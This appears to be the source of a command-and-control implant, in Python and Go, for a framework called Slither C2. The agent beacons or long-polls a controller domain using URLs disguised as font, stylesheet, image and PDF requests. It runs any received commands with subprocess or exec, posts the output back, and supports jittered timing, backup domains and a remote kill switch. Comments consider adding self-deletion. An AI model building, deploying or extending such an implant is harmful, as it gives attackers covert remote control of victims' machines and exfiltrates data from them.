File: agent.py
# NOTE: This is a newer agent file to handle more advanced beacon and session communication
# At some point the agent_html.py will be reintegrated in some form here
from os import error
from sys import stderr
import time
import random
from flask import request
import requests
import subprocess
from typing import List

# Honestly probably the smart thing would be to just copy from what they have in sliver, as those are likely mapped to go use cases
# For now though:

# .css - Key exchange (to be implemented once we add encryption)
# .png - close session messages
# .woff - Gets information on a beacon request
# .js - session messages


# TODO: Make it such that the agent sends using a protobuf, rather than a json, using json for now as honestly it is just easier. I ain't trying to be an attacker
# TODO: Make it so that there is a timer or handler to swtich to an alternate domain if this domain is not response
# TODO: Make it such that a command list can specify whether or not a response should be sent back!
class Agent:
    def __init__(
        self,
        domains: list[str],
        mode: str = "b",
        session=None,
        beacon_timer: int = 60,
        watchdog_timer: int = 7000,
    ):
        """Agent class:

        Args:
            domains - a list of domains that the agent can utilize for communication
                    the first domain is the primary domain, and all others afterwards are backups

            mode - sets the starting mode of the agent, either session or beacon based communication.
                set to beacon by default
        """

        self.domains = domains
        self.mode = mode
        self.stayAlive = True
        self.activeDomain = domains[0]
        self.session = None

        # NOTE: Other things that can be added here in the future
        # encoders - the type of encoders that are used/available
        # url params - different url paramters to obfuscate

        # Timers that dictate the agents communication and timeouts
        # Inspired by the timeouts that are used in MITRE Caldera

        self.beacon_inter = beacon_timer

        # How long the agent waits for an unreachable server before terminating itself
        # If there is a backup domain, the agent will switch to that domain
        self.watchdog_timer = watchdog_timer
        # Modification check sees if we need to request modifications from the server
        self.modification_check = False

    ##TOTAL EXECUTION FUNCTIONS##
    # The below fucntions handle the entire execution process for beaconining, polling, and agent modificaiton commands

    def execute_beacon_chain(self):
        """Executes the entire chain of beaconing including the execution and the sending back of commands
        Returns:
            - True if the chain of sending was sucessful
            - False if the chain of sending the command was not sucessful
        """

        if not self.is_beacon():
            raise ValueError("Beacon command called on an agent set to long poll")

        # The agent checks in to see if commands are available
        commands = self._check_in()

        if commands:
            self.check_for_modification_flag(commands)
            results = self._execute_commands(commands)
            return self._beacon_back(commands, results)
        else:
            # Means that no commands were recieved (or there was a connection erorr and we sleep)
            return False

    def execute_poll_sequence(self):
        """
        Function to be called to repeatedly poll the agent, this should be in a while loop of sorts
        """

        if self.is_beacon():
            raise ValueError("Long Polling command called on beacon agent")

        # Establish a long polling session
        self.session = requests.Session()

        commands = self._long_poll()

        if commands:
            self.check_for_modification_flag(commands)
            results = self._execute_commands(commands)
            self._long_poll_back(commands, results)
            return True
        else:
            return False

    def apply_modification_commands(self):
        """
        Higher level function that manages the whole flow of applying modification commands
            - Gets the commands from the server
            - parses them
            - Applies them

            Returns:
                Two parallel arrays which contain a list of the commands that were parsed and executed (or attempted to be) as well as the output
                    commands - All the commands that were parsed and called
                    results - the results of those commands
        """

        unparsed_commands = self.get_modification_commands()
        if unparsed_commands:
            results = []
            clean_commands = self._parse_modification_commands(unparsed_commands)
            for cmd_type, cmd_value in clean_commands:
                try:
                    result = self._handle_modification_command(
                        cmd_type=cmd_type, cmd_value=cmd_value
                    )
                    results.append(result)
                except Exception as e:
                    results.append(str(e))

            print(f"This is the results:{results}")
            print(f"This is the commands:{clean_commands}")

            # Send results back
            self._send_modification_command_results(unparsed_commands, results)

            self.modification_check = False
            return True
        else:
            # In the case where no commands were found at the agent modification command endpoint
            self.modification_check = False
            # send results back that no commands were found
            return None

    def _beacon_back(self, commands, results) -> bool:
        """Beacons back the output of any commands to the C2 server
        Args:
            commands: List of original commands that were executed
            results: List of command results/outputs
        Returns:
            True - Results were successfully sent back
            False - Results were not sucessfully sent back"""

        if not self.is_beacon():
            raise ValueError("Beacon command called on an agent set to long poll")

        self.session = requests.Session()

        try:
            # TODO: This should also have the nonce and have some randomly generated names for the files
            payload = {"commands": commands, "results": results}

            request = self.session.post(
                f"http://{self.activeDomain}/fjioawejfoew/jfioewajfo/test.css",
                json=payload,
            )

            # Check for any failed connections or attempts
            request.raise_for_status()

            return True

        except requests.exceptions.Timeout:
            print("Request timed out")
        except requests.exceptions.ConnectionError:
            print("Connection error occurred")
        except requests.exceptions.HTTPError as e:
            print(f"HTTP error: {e}")
            # Here might be where the watchdog_timer and itnerval timer setting is set up
        except requests.exceptions.RequestException as e:
            print(f"Request failed: {e}")
        except Exception as e:
            print(f"Unexpecd error: {e}")

        return False

    def _check_in(self) -> List[str] | None:
        """Obtains any available commands if there are any, if no commands are available it fails"""

        if not self.is_beacon():
            raise ValueError("Beacon command called on an agent set to long poll")
        # Generate a session
        self.session = requests.Session()

        # TODO: In the future, this request is going to require: encryption, nonce and obfuscation

        try:
            request = self.session.get(
                # TODO: In the futeu this should be a randomly generated URL and woff file
                f"http://{self.activeDomain}/jfiowe/jfioewfj/test.woff"
            )
            request.raise_for_status()

            # Otherwise we obtain the available commands
            response = request.json()
            return response["commands"]

        except requests.exceptions.Timeout:
            print("Request timed out")
        except requests.exceptions.ConnectionError:
            print("Connection error occurred")
        except requests.exceptions.HTTPError as e:
            print(f"HTTP error: {e}")
            # Here might be where the watchdog_timer and itnerval timer setting is set up
        except requests.exceptions.RequestException as e:
            print(f"Request failed: {e}")
        except Exception as e:
            print(f"Unexpecd error: {e}")

        return None

    def _long_poll(self):
        # long poll url
        if self.is_beacon():
            raise ValueError("Long Polling command called on beacon agent")
        if not self.session:
            raise ValueError("No session is being passed for long polling")

        long_poll_request_url = f"http://{self.activeDomain}/foew/fjewoj/test.png"
        try:
            request = self.session.get(url=long_poll_request_url)
            request.raise_for_status()

            response = request.json()
            return response["commands"]

        except requests.exceptions.Timeout:
            print("Request timed out")
        except requests.exceptions.ConnectionError:
            print("Connection error occurred")
        except requests.exceptions.HTTPError as e:
            print(f"HTTP error: {e}")
            # Here might be where the watchdog_timer and itnerval timer setting is set up
        except requests.exceptions.RequestException as e:
            print(f"Request failed: {e}")
        except Exception as e:
            print(f"Unexpecd error: {e}")

        return None

    def _long_poll_back(self, commands, results):
        if self.is_beacon():
            raise ValueError("Long Polling command called on beacon agent")

        if self.is_beacon():
            raise ValueError("Long Polling command called on beacon agent")
        if not self.session:
            raise ValueError("No session is being passed for long polling")

        long_poll_results_url = f"http://{self.activeDomain}/foew/fjewoj/test.js"
        try:
            payload = {"commands": commands, "results": results}
            request = self.session.post(url=long_poll_results_url, json=payload)
            request.raise_for_status()

            return True
        except requests.exceptions.Timeout:
            print("Request timed out")
        except requests.exceptions.ConnectionError:
            print("Connection error occurred")
        except requests.exceptions.HTTPError as e:
            print(f"HTTP error: {e}")
            # Here might be where the watchdog_timer and itnerval timer setting is set up
        except requests.exceptions.RequestException as e:
            print(f"Request failed: {e}")
        except Exception as e:
            print(f"Unexpecd error: {e}")

        return None

    def get_modification_commands(self):
        """
        Agent sends a get request to the agent modification end point and makes changes (any file with the extension .pdf)
        """

        if not self.is_modify():
            raise ValueError(
                "Modify request was called when teh agent was not in the modify mode"
            )
        self.session = requests.Session()

        # TODO: In the future, this request is going to require: encryption, nonce and obfuscation

        try:
            request = self.session.get(
                # TODO: In the future this should be randomly generated pdf file
                f"http://{self.activeDomain}/jfiowe/jfioewfj/test.pdf"
            )
            request.raise_for_status()

            response = request.json()
            return response["commands"]

        except requests.exceptions.Timeout:
            print("Request timed out")
        except requests.exceptions.ConnectionError:
            print("Connection error occurred")
        except requests.exceptions.HTTPError as e:
            print(f"HTTP error: {e}")
            # Here might be where the watchdog_timer and itnerval timer setting is set up
        except requests.exceptions.RequestException as e:
            print(f"Request failed: {e}")
        except Exception as e:
            print(f"Unexpecd error: {e}")

        return None

    def _send_modification_command_results(self, commands, results):
        self.session = requests.Session()
        agent_mod__results_url = f"http://{self.activeDomain}/foew/fjewoj/test.gif"
        try:
            payload = {"commands": commands, "results": results}
            request = self.session.post(url=agent_mod__results_url, json=payload)
            request.raise_for_status()

            response = request.json()
            print(response)
            if response["status"] == "received":
                return True

        except requests.exceptions.Timeout:
            print("Request timed out")
        except requests.exceptions.ConnectionError:
            print("Connection error occurred")
        except requests.exceptions.HTTPError as e:
            print(f"HTTP error: {e}")
            # Here might be where the watchdog_timer and itnerval timer setting is set up
        except requests.exceptions.RequestException as e:
            print(f"Request failed: {e}")
        except Exception as e:
            print(f"Unexpecd error: {e}")

        return None

    def check_for_modification_flag(self, commands):
        """
        Takes a list of execution commands that are pulled from the server and checks agent_modification was called and pulled through
        """
        if "agent_modification" in commands:
            commands.remove("agent_modification")
            self.modification_check = True

    def _execute_commands(self, commands_list):
        """
        Takes a list of commands, and strips them appropriately so that they can be passed to be executed
        """
        results = []

        for command in commands_list:
            command_as_list = command.split()
            print(command_as_list)
            results.append(self._execute_command(command_list=command_as_list))
        return results

    def _execute_command(self, command_list):
        """
        Executes commands (passed in as a parameter of a list) in order to run
        """
        try:
            """
            Returns a CompletedProcess object with the following attributes: 
            - .returncode
            - .stdout 
            - .stderr 
            - .args 
            """

            result = subprocess.run(
                command_list,
                capture_output=True,
                text=True,
                check=True,
            )
            return result.stdout
        except subprocess.CalledProcessError as e:
            print(f"Command failed {e.stderr}")
            return e.stderr
        except Exception as e:
            print(f"Error: {e}")
            return str(e)

    def get_beacon_range(self, range: int = 10):
        """Returns a range for the beacon as a tuple this is so it runs on a slight jitter
        Args:
            range - +- the interval set on initialization"""

        return (self.beacon_inter - range, self.beacon_inter + range)

    def _parse_modification_commands(self, unparsed_commands):
        """
        Takes a list of modification commands and pases them appropriately
        """

        commands = []
        for command in unparsed_commands:
            if ":" in command:
                cmd_type, cmd_value = command.split(":", 1)
                commands.append((cmd_type.strip(), cmd_value.strip()))
            else:
                cmd_type, cmd_value = command.strip(), None
                commands.append((cmd_type.strip(), cmd_value))

        return commands

    def _handle_modification_command(self, cmd_type: str, cmd_value: str):
        """Route modification commands to appropriate handlers using dictionary mapping"""
        handlers = {
            "watchdog": lambda v: self.set_watchdog_timer(int(v)),
            "domain_add": lambda v: self.add_domain(v),
            "domain_remove": lambda v: self.remove_domain(v),
            "domain_active": lambda v: self.set_new_active_domain(v),
            "beacon": lambda v: self.set_beacon_interval(int(v)),
            "change_mode": lambda v: self.set_mode(v),
            "kill": lambda v: self.kill(),
        }

        if cmd_type not in handlers:
            raise ValueError(f"Unknown modification command: {cmd_type}")

        return handlers[cmd_type](cmd_value)

    def remove_domain(self, domain):
        """
        Remove a domain that is in the domains list
        Will not remove a domain if it is the last domain in the list
        """
        if domain not in self.domains:
            raise ValueError(f"Domain '{domain}' not found in domains list")

        if len(self.domains) <= 1:
            raise ValueError("Cannot remove domain: it is the only remaining domain")

        # If removing active domain, switch to another one first
        if domain == self.activeDomain:
            new_active = next(d for d in self.domains if d != domain)
            self.activeDomain = new_active
            print(f"Switched active domain to {new_active}")

        self.domains.remove(domain)
        return f"Removed domain: {domain}"

    def add_domain(self, domain):
        """Add domain"""
        if not domain:
            raise ValueError("Domain cannot be empty")
        if domain in self.domains:
            raise ValueError(f"Domain '{domain}' already exists in domains list")
        self.domains.append(domain)
        return f"Domain '{domain}' added successfully"

    def set_new_active_domain(self, domain):
        """
        Set a new active domain, either due to user input, or because of failed requests to the previously set domain
        """
        if not domain:
            raise ValueError("Domain cannot be empty")
        if domain not in self.domains:
            raise ValueError(f"Domain '{domain}' not in available domains list")
        self.activeDomain = domain
        return f"Active domain set to {domain}"

    def is_alive(self):
        return self.stayAlive

    def kill(self):
        """
        Agent should kill either if all domains have failed to been reahced for a specific amount off time or because of user instructions
        """
        # Maybe there should be some self deletion code? I have no idea how that would work, but that could be worht looking into!
        # Delete the file, then just shut down the process that is being ran?
        self.stayAlive = False
        return "Agent terminated"

    def is_beacon(self):
        return self.mode == "b"

    def _set_beacon(self):
        self.mode = "b"
        return

    def set_beacon_interval(self, interval: int):
        """Set beacon interval"""
        if not isinstance(interval, int) or interval < 1:
            raise ValueError("Beacon interval must be positive integer")
        self.beacon_inter = interval
        return f"Beacon interval set to {interval} seconds"

    def set_watchdog_timer(self, timer: int):
        """Set watchdog timer"""
        if not isinstance(timer, int) or timer < 1:
            raise ValueError("Watchdog timer must be positive integer")
        self.watchdog_timer = timer
        return f"Watchdog timer set to {timer} seconds"

    def is_modify(self):
        return self.modification_check

    def _set_long_poll(self):
        self.mode = "l"
        # Set a session for the longpolling
        self.session = requests.Session()
        return

    def set_mode(self, mode: str):
        """Set agent mode"""
        if mode == "l":
            self._set_long_poll()
            return "Switched to long-poll mode"
        elif mode == "b":
            self._set_beacon()
            return "Switched to beacon mode"
        else:
            raise ValueError(f"Invalid mode: {mode}")


# Note to self, if debugging (remember that one time I know you do) this makes it so that main DOES not run fi this is an import
if __name__ == "__main__":
    # Execution loop for the agent running at some point this should be what is ran in the executable
    agent = Agent(["localhost2"])

    while agent.is_alive():
        # If the modification command boolean is true:
        if agent.is_modify():
            # We call continue here os that if the kill command is passed, we terminate
            agent.apply_modification_commands()
            continue
        # TODO: What happens if both of these fail, what is hte backup mechanism?
        # Check to see whether the agent in long polling mode or not
        if agent.is_beacon():
            agent.execute_beacon_chain()
            # Set to sleep for the beacon chain
        else:
            # This just needs to constantly be called
            while agent.is_alive() and not agent.is_modify():
                agent.execute_poll_sequence()

File: agent/agent.go
// Package agent provides a C2 agent compatible with the Slither C2 Framework
package agent

import (
	"bytes"
	"context"
	_ "embed" // Has hte underscore as it is only being used for side efects
	"encoding/json"
	"errors"
	"fmt"
	"log"
	"math/rand"
	"net/http"
	"os/exec"
	"slices"
	"strings"
	"time"
)

// Agent represents a single C2 agent that can operate in a beacon or long-poll mode
// There is only a single Agent declared for each class
type Agent struct {
	domains           []string
	mode              string // l for long-pool, b for beacon
	stayAlive         bool
	activeDomain      string
	client            *http.Client
	beaconInter       int
	watchdogTimer     int
	modificationCheck bool
}

// agentConfig is the complete configuration structure of contents to be loaded from agent_config.json
type agentConfig struct {
	Domains        []string                     `json:"domains"`
	BeaconTimer    int                          `json:"beacon_timer"`
	WatchdogTimer  int                          `json:"watchdog_timer"`
	URLExtensions  URLExtensions                `json:"url_extensions"`
	URLParameters  URLParameters                `json:"url_parameters"`
	FileExtensions map[string]FileExtensionInfo `json:"file_extensions"`
}

// URLExtensions is for path segments to create realistic URLS, file extension agnostic
type URLExtensions struct {
	CommonPaths    []string `json:"common_paths"`
	RandomSegments []string `json:"random_segments"`
}

// URLParameters is for parameters to create realistic URLs, file extension agnostic
type URLParameters struct {
	CommonParams    []string `json:"common_params"`
	TimestampValues []string `json:"timestamp_values"`
	VersionValues   []string `json:"version_values"`
	HashValues      []string `json:"hash_values"`
}

// FileExtensionInfo is for generating realistic fileNames, is NOT file extension agnostic
type FileExtensionInfo struct {
	Paths     []string `json:"paths"`
	Params    []string `json:"params"`
	Filenames []string `json:"filenames"`
}

func ExtractAndCreateAgent(configData []byte) (*Agent, *agentConfig, error) {
	ac, err := extractAgentConfig(configData)
	if err != nil {
		fmt.Print(err)
		return nil, ac, err
	}
	agent := newAgent(ac.Domains, "b", ac.BeaconTimer, ac.WatchdogTimer)
	return agent, ac, err
}

// NewAgent creates a new Agent
// All parameters for rendering an agent should be inputted.
func newAgent(domains []string, mode string, beaconTimer int, watchdogTimer int) *Agent {
	// Sesssion is not inputted as that is handled by modification commands
	return &Agent{
		domains:           domains,
		mode:              "b",
		stayAlive:         true,
		activeDomain:      domains[0],
		client:            &http.Client{Timeout: 30 * time.Second},
		beaconInter:       beaconTimer,
		watchdogTimer:     watchdogTimer,
		modificationCheck: false,
	}
}

// extractAgentConfig() extracts the agent config from the json
// uses the agentconfig structs defined above
func extractAgentConfig(configData []byte) (*agentConfig, error) {
	var ac agentConfig

	// Unmarshal extracts text from a json and applies to to a matching struct
	// The pointer to the struct is passed in
	err := json.Unmarshal(configData, &ac)
	if err != nil {
		fmt.Println(err)
		return nil, err
	}

	return &ac, err
}

// COMMAND EXECUTION FUNCTIONS (System and agent modification commands)

// executeCommands takes a list of commands and executes them
func executeCommands(a *Agent, commands []string) []string {
	// TODO: Implement command execution
	commandResults := make([]string, len(commands))

	for i, command := range commands {
		result := executeCommand(a, command)
		commandResults[i] = result
	}

	return commandResults
}

// executeCommand executes a single command
func executeCommand(a *Agent, command string) string {
	commandParts := strings.Fields(command)
	if len(commandParts) == 0 {
		return "Error: empty command"
	}

	ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
	defer cancel()

	cmd := exec.CommandContext(ctx, commandParts[0], commandParts[1:]...)
	output, err := cmd.CombinedOutput()
	if err != nil {
		if ctx.Err() == context.DeadlineExceeded {
			return "Error: command timed out after 30 seconds"
		}
		return fmt.Sprintf("Command failed: %v\nOutput: %s", err, string(output))
	}

	return string(output)
}

// modificationFlagCheck() checks to see if the flag indicating a modification to the agent should occur on the next cycle exists
func modificationFlagCheck(a *Agent, commands []string) []string {
	index := slices.Index(commands, "agent_modification")

	if index != -1 {
		commands = append(commands[:index], commands[index+1:]...)
		a.modificationCheck = true
	}

	return commands
}

// applyModificationCommands manages the whole flow of applying modification commands
func applyModificationCommands(a *Agent) bool {
	// TODO: Implement modification command application
	return false
}

// parseModificationCommands takes a list of modification commands and parses them appropriately
func parseModificationCommands(a *Agent, unparsedCommands *[]string) [][2]string {
	// TODO: Implement modification command parsing
	return nil
}

// handleModificationCommand routes modification commands to appropriate handlers to execute commands
func handleModificationCommand(a *Agent, cmdType string, cmdValue string) string {
	// TODO: Implement modification command handling
	return ""
}

// COMMUNICATION FUNCTIONS

// executeBeaconChain executes the entire chain of beaconing including execution and sending back of commands
func executeBeaconChain(a *Agent, ac *agentConfig) bool {
	if !isBeacon(a) {
		return false
	}

	commands, err := beaconIn(a, ac)
	if err != nil {
		return false
	}

	if len(commands) == 0 {
		return true
	}

	commands = modificationFlagCheck(a, commands)
	results := executeCommands(a, commands)

	status, err := beaconOut(a, ac, commands, results)
	if err != nil {
		return false
	}

	return status
}

// executePollSequence function to be called to repeatedly poll the agent
func executePollSequence(a *Agent) bool {
	// TODO: Implement long polling sequence
	return false
}

// beaconOut beacons back the output of any commands to the C2 server
func beaconOut(a *Agent, ac *agentConfig, commands []string, results []string) (bool, error) {
	// TODO: Implement beacon back functionality
	if !isBeacon(a) {
		return false, errors.New("beacon function called while agent was in long poll mode")
	}
	url, err := generateURL(a, ac, ".css")
	if err != nil {
		return false, err
	}

	payload := map[string]interface{}{
		"commands": commands,
		"results":  results,
	}

	// Marshal into a json format
	jsonPayload, err := json.Marshal(payload)
	if err != nil {
		return false, err
	}

	// Create a reader
	reader := bytes.NewReader(jsonPayload)

	resp, err := a.client.Post(url, "application/json", reader)
	if err != nil {
		return false, err
	}

	defer resp.Body.Close()

	return true, nil
}

// beaconIn obtains any available commands if there are any
func beaconIn(a *Agent, ac *agentConfig) ([]string, error) {
	if !isBeacon(a) {
		return nil, errors.New("beacon function called while agent was in long poll mode")
	}
	url, err := generateURL(a, ac, ".woff")
	if err != nil {
		return nil, err
	}

	resp, err := a.client.Get(url)
	if err != nil {
		return nil, err
	}

	// close the response body
	defer resp.Body.Close()
	// Check HTTP status code
	if resp.StatusCode == 404 {
		// No commands available
		return []string{}, nil
	}

	if resp.StatusCode != 200 {
		return nil, fmt.Errorf("unexpected status code: %d", resp.StatusCode)
	}

	var response struct {
		Commands []string `json:"commands"`
		Status   string   `json:"status"`
	}

	err = json.NewDecoder(resp.Body).Decode(&response)
	if err != nil {
		return nil, err
	}

	return response.Commands, nil
}

// longPoll performs long polling request for commands
func longPoll(a *Agent) ([]string, error) {
	// Connection being held open is on the server side.
	// Timeout for the client should be extended
	if isBeacon(a) {
		return nil, errors.New("long poll method called while agent is in beacon mode")
	}
	return nil, nil
}

// longPollBack sends long poll results back to server
func longPollBack(a *Agent, commands []string, results []string) bool {
	// TODO: Implement long poll back functionality
	return false
}

// getModificationCommands sends a get request to the agent modification endpoint
func getModificationCommands(a *Agent) []string {
	// TODO: Implement modification command retrieval
	return nil
}

// sendModificationCommandResults sends modification command results back to server
func sendModificationCommandResults(a *Agent, commands []string, results []string) bool {
	// TODO: Implement sending modification results
	return false
}

// generateURL generates a randomized URL using parameters from agent_config.json
func generateURL(a *Agent, ac *agentConfig, filetype string) (string, error) {
	// Get the specific configuration for the file extension
	fileConfig, exists := ac.FileExtensions[filetype]
	if !exists {
		return "", errors.New("not a valid extension or does not exist in the config")
	}

	// Make sure that all the required parameters are available
	if len(fileConfig.Paths) == 0 || len(ac.URLExtensions.RandomSegments) == 0 || len(fileConfig.Filenames) == 0 {
		return "", errors.New("insufficient configuration data for file type")
	}

	// Generate the URL components randomly
	basePath := fileConfig.Paths[rand.Intn(len(fileConfig.Paths))]
	randomSegment := ac.URLExtensions.RandomSegments[rand.Intn(len(ac.URLExtensions.RandomSegments))]
	filename := fileConfig.Filenames[rand.Intn(len(fileConfig.Filenames))]

	// Construct the URL path
	urlPath := fmt.Sprintf("%s/%s/%s%s", basePath, randomSegment, filename, filetype)

	// Construct the full URL
	fullURL := fmt.Sprintf("http://%s%s", a.activeDomain, urlPath)

	return fullURL, nil
}

// GETTER AND SETTER COMMANDS

// removeDomain removes a domain from the list of the agents current domains
// This function will fail if there is only one domain in the list, or the domain that is requested to be removed does not exist
func removeDomain(a *Agent, domain string) error {
	if len(a.domains) < 2 {
		return errors.New("domain list only has one domain, cannot remove")
	}

	index := slices.Index(a.domains, domain)

	if index == -1 {
		return errors.New("domain is not in the domain list")
	}

	a.domains = append(a.domains[:index], a.domains[index+1:]...)

	return nil
}

// addDomain adds a domain to the list of the agents possible domains
// Errors if the domain to be added already exists
func addDomain(a *Agent, domain string) error {
	if slices.Contains(a.domains, domain) {
		return errors.New("domain already exists inside of the domain list")
	}

	a.domains = append(a.domains, domain)

	return nil
}

func setActiveDomain(a *Agent, domain string) error {
	if !slices.Contains(a.domains, domain) {
		return errors.New("domain does not exist inside of the domain list, please add it first")
	}

	a.activeDomain = domain

	return nil
}

// isAlive returns true if the agent is alive
func isAlive(a *Agent) bool {
	return a.stayAlive
}

// killAgent kills the agent by setting its aliveStatus to false
func killAgent(a *Agent) {
	a.stayAlive = false
}

// isBeacon returns true if the agent is in beacon mode
func isBeacon(a *Agent) bool {
	return a.mode == "b"
}

// setBeacon sets the agent in beacon mode
func setBeacon(a *Agent) {
	a.mode = "b"
}

// setLongpoll sets the agent in longpolling mode
func setLongpoll(a *Agent) {
	a.mode = "l"
	// TODO: A session should be set for the long polling
}

// setBeaconInter sets the beacon interval timer from a modification command
func setBeaconInter(a *Agent, interval int) error {
	if interval < 1 {
		return errors.New("interval must be a positive integer")
	}
	a.beaconInter = interval
	return nil
}

// setWatchdogTimer sets the watchdog timer
func setWatchdogTimer(a *Agent, timer int) error {
	if timer < 1 {
		return errors.New("watchdog timer must be positive integer")
	}
	a.watchdogTimer = timer
	return nil
}

// getBeaconJitter returns a random beacon as a time.Duration object with jitter applied
func getBeaconJitter(a *Agent, rangeVal float64) time.Duration {
	beaconBase := float64(a.beaconInter)
	beaconMin := beaconBase - rangeVal
	beaconMax := beaconBase + rangeVal

	// Ensure minimum is not negative
	if beaconMin < 0.1 {
		beaconMin = 0.1
	}

	// Generate random float between beaconMin and beaconMax
	jitterRange := beaconMax - beaconMin
	randomValue := beaconMin + rand.Float64()*jitterRange

	return time.Duration(randomValue * float64(time.Second))
}

func isModify(a *Agent) bool {
	return a.modificationCheck
}

//go:embed agent_config.json
var configFile []byte // Embeds the agent_config as a json

func main() {
	agent, config, err := ExtractAndCreateAgent(configFile)
	if err != nil {
		log.Fatalf("Issue with the intitialization of agent: %v", err)
	}

	// Enter agent loop
	for isAlive(agent) {

		// Check for the modification commands to the agent's nature
		if isModify(agent) {
			// TODO: Application of the modification commands

			// Check if the modification commands killed the agent
			if !isAlive(agent) {
				break
			}
		}

		if isBeacon(agent) {
			executeBeaconChain(agent, config)
			// TODO: In the future have the beaconRangeVal be in config, idc rn
			interval := getBeaconJitter(agent, 10.0)
			time.Sleep(interval)
		} else {
			for isAlive(agent) && isModify(agent) {
				executePollSequence(agent)
			}
		}

	}
}
